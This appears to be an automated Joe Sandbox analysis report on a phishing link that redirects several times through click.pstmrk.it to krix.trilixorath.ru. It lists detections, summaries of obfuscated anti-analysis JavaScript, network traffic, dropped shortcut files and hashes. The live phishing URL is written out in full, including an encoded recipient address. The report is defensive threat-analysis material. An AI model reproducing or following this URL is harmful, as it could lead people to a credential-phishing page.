Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a

Overview

General Information

Sample URL:https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0b
Analysis ID:1592192
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,12759584428047102971,6980066568874774743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a-9e5e-2e5b812aa376%252F1%252FRv8K01wlIm%2FGnrm%2F0LG6AQ%2FAQ%2Fd3de0b8c-c5b0-4373-837c-1208c821335d%2F1%2FcPupLR_Z5R/Gnrm/0LG6AQ/AQ/34bb3404-8af3-4f8d-bb3d-16f29875c67b/1/bOkWAbQIme#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jn" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_64JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_64, type: DROPPED
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://krix.trilixorath.ru/fiAG/#Y3ludGhpYUBsYXVn... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also uses a setInterval loop to repeatedly trigger a debugger statement, which could be an attempt to detect and evade analysis. Overall, this script exhibits a high degree of malicious intent and should be considered a significant security risk.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://krix.trilixorath.ru/fiAG/#Y3ludGhpYUBsYXVn... This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution via the Proxy object and the use of obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, and this script should be considered a significant security risk.
    Source: https://krix.trilixorath.ru/fiAG/#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3JnHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:51420 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:51418 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: global trafficDNS traffic detected: DNS query: click.pstmrk.it
    Source: global trafficDNS traffic detected: DNS query: krix.trilixorath.ru
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51425
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51426
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51420
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51424
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51422
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 51420 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51425 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:51420 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@18/10@16/163
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,12759584428047102971,6980066568874774743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a-9e5e-2e5b812aa376%252F1%252FRv8K01wlIm%2FGnrm%2F0LG6AQ%2FAQ%2Fd3de0b8c-c5b0-4373-837c-1208c821335d%2F1%2FcPupLR_Z5R/Gnrm/0LG6AQ/AQ/34bb3404-8af3-4f8d-bb3d-16f29875c67b/1/bOkWAbQIme#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jn"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,12759584428047102971,6980066568874774743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a-9e5e-2e5b812aa376%252F1%252FRv8K01wlIm%2FGnrm%2F0LG6AQ%2FAQ%2Fd3de0b8c-c5b0-4373-837c-1208c821335d%2F1%2FcPupLR_Z5R/Gnrm/0LG6AQ/AQ/34bb3404-8af3-4f8d-bb3d-16f29875c67b/1/bOkWAbQIme#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jn0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.194.137
      truefalse
        high
        cdn.prod.website-files.com
        104.18.161.117
        truefalse
          high
          click.pstmrk.it
          63.32.154.112
          truefalse
            high
            www.google.com
            142.250.185.228
            truefalse
              high
              krix.trilixorath.ru
              104.21.32.1
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://krix.trilixorath.ru/fiAG/#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jnfalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.228
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  104.21.32.1
                  krix.trilixorath.ruUnited States
                  13335CLOUDFLARENETUStrue
                  104.18.160.117
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  173.194.76.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  104.18.161.117
                  cdn.prod.website-files.comUnited States
                  13335CLOUDFLARENETUSfalse
                  216.58.206.46
                  unknownUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  142.250.185.142
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.195
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.186.131
                  unknownUnited States
                  15169GOOGLEUSfalse
                  151.101.194.137
                  code.jquery.comUnited States
                  54113FASTLYUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  142.250.72.110
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.184.234
                  unknownUnited States
                  15169GOOGLEUSfalse
                  63.32.154.112
                  click.pstmrk.itUnited States
                  16509AMAZON-02USfalse
                  IP
                  192.168.2.16
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1592192
                  Start date and time:2025-01-15 22:13:32 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a-9e5e-2e5b812aa376%252F1%252FRv8K01wlIm%2FGnrm%2F0LG6AQ%2FAQ%2Fd3de0b8c-c5b0-4373-837c-1208c821335d%2F1%2FcPupLR_Z5R/Gnrm/0LG6AQ/AQ/34bb3404-8af3-4f8d-bb3d-16f29875c67b/1/bOkWAbQIme#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jn
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@18/10@16/163
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.142, 173.194.76.84, 216.58.206.78
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fkrix.trilixorath.ru%2525252FfiAG%2525252F%25252FGnrm%25252Fz7G6AQ%25252FAQ%25252F356d35f6-0bd4-4745-bc22-b582dc5b5648%25252F1%25252F_KmSK3kUSr%252FGnrm%252Fz7G6AQ%252FAQ%252F025cf656-e27b-422a-9e5e-2e5b812aa376%252F1%252FRv8K01wlIm%2FGnrm%2F0LG6AQ%2FAQ%2Fd3de0b8c-c5b0-4373-837c-1208c821335d%2F1%2FcPupLR_Z5R/Gnrm/0LG6AQ/AQ/34bb3404-8af3-4f8d-bb3d-16f29875c67b/1/bOkWAbQIme#Y3ludGhpYUBsYXVnaGluZ2d1bGwub3Jn
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:14:07 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2673
                  Entropy (8bit):3.991165170309845
                  Encrypted:false
                  SSDEEP:
                  MD5:D498E2F01027388C6EA9D157105CAF73
                  SHA1:F415D94CED4026BC0EC4DC2E31ECC25DB0274A3C
                  SHA-256:CC70DF05C8EE95864F0A974DD737D3315581C48B066832F8416A85052E905DDA
                  SHA-512:17E912EFA5A9DF8CE45CC02706848D90E452A1EE258CA58F43DE1F653727800BB47CDAAF103172FBB774B77E1231BE454288CC322A26EA162030B186792C53CA
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....+.i.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:14:07 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2675
                  Entropy (8bit):4.008634965342572
                  Encrypted:false
                  SSDEEP:
                  MD5:7504A8DCA83919AC8234C179319ADB5F
                  SHA1:430AE5DFDA8532779ED3EE4CF0854EBB8E5540D4
                  SHA-256:73F6174424CC43B9BA1F7E30DBE2FD06683429A29A871CBB0071BFA23E92A872
                  SHA-512:06FCE2C253630EF0B45CA2B95319940E175B8793EE0BAD2E35053F5AA1214171468A6B2B7EDC9574BC11CEB6DD4ABC4828F1588E84E9BB7E590EC5BACA6F5427
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....u..i.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2689
                  Entropy (8bit):4.016755585292952
                  Encrypted:false
                  SSDEEP:
                  MD5:96065C0EA5AA33BF9BE03862A85F7BA0
                  SHA1:9F85A5343B2F0BC5ED257285DB93BCD03E6883D0
                  SHA-256:E93935A2ACD433F854F345A84D7F4AB9AF4706E1098315FC2B2A15D03F4C0097
                  SHA-512:E7635A56F92C8E7DD71339E89BDDF1E3149A2C91451D4E0967B68A20AF5C451A6887CD3D69601DF32CCBFA58D8EDE0C96C089A64102DB5BF6B33D1CD0D01188D
                  Malicious:false
                  Reputation:unknown
